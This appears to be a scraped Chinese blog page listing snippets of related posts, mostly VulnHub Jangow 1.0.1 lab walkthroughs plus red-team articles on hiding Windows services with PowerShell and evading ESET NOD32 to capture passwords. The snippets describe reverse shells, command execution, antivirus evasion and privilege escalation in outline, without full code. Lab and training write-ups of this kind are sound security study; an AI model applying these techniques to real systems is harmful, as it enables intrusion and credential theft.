在IT安全领域,红队活动通常模拟黑客攻击行为,用于测试和强化组织的安全防御。本文将探讨一种红队技巧,即如何使用PowerShell隐藏Windows服务,以提高在后渗透测试阶段的持久性和隐蔽性。 首先,创建一个Windows...
红队技巧:绕过ESET_NOD32抓取密码1
08-03
网络安全领域,红队技巧通常涉及模拟黑客攻击行为,以测试和评估组织的安全防御系统。在本场景中,我们讨论的是如何绕过ESET NOD32安全软件,特别是防止它捕获敏感密码。ESET NOD32是一款知名的安全解决方案,能够...
1-vulnhub靶场,JANGOW: 1.0.1
qq_49078152的博客
08-13 319
hulnhub靶机
vlunhub靶机之JANGOW:1.0.1
hanjinming110的博客
03-11 191
vlunhub系列之JANGOW
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 685
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3215
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
jangow-01-1.0.1
qq_46140711的博客
09-22 1222
jangow-01-1.0.1靶机练习
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 813
网络安全
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1233
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
Jangow-1.0.1靶机
最新发布
m0_59151303的博客
07-31 518
发现html目录下有个backup文件,里面也有账号密码,继续寻找,找到一串md5。发现wordpress文件夹下有一个config.php,里面有数据库的账号密码。开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了。发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀。先尝试反弹一个shell过来,通过蚁剑写php反弹shell。发现是有网页的,随便点点,看看有没有能注入或者渗透的点。我们试着运行一下命令,发现是可以运行命令的。暂时没用,先保存一下,继续查找。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1172
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值